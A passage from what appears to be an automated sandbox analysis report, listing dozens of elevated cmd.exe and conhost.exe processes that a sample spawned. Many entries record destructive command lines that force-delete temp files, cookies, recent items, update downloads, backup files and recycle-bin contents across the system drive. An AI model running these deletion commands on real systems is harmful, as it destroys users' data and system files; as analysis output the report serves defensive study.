                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:34
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:35
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:36
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:37
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:38
                              Start time:03:14:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:39
                              Start time:03:14:06
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:40
                              Start time:03:14:06
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:42
                              Start time:03:14:06
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:44
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:45
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:46
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:47
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:48
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:49
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:50
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:51
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:52
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:53
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:54
                              Start time:03:14:32
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:55
                              Start time:03:14:33
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:56
                              Start time:03:14:33
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:57
                              Start time:03:14:33
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:58
                              Start time:03:14:33
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:59
                              Start time:03:14:33
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:60
                              Start time:03:15:00
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:61
                              Start time:03:15:00
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:62
                              Start time:03:15:00
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:63
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:64
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:65
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:66
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:67
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:68
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:69
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:70
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:71
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:72
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:73
                              Start time:03:15:01
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:74
                              Start time:03:15:02
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:75
                              Start time:03:15:02
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:77
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:78
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:79
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:80
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:81
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:82
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:83
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:84
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:85
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:86
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:87
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:88
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:89
                              Start time:03:15:45
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:90
                              Start time:03:15:46
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:91
                              Start time:03:15:46
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:92
                              Start time:03:15:46
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:93
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:94
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:95
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:96
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:97
                              Start time:03:16:05
                              Start date:23/12/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
                              Imagebase:0xc50000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              General

                              Target ID:98
                              Start time:03:16:05
                              Start date:23/12/2024
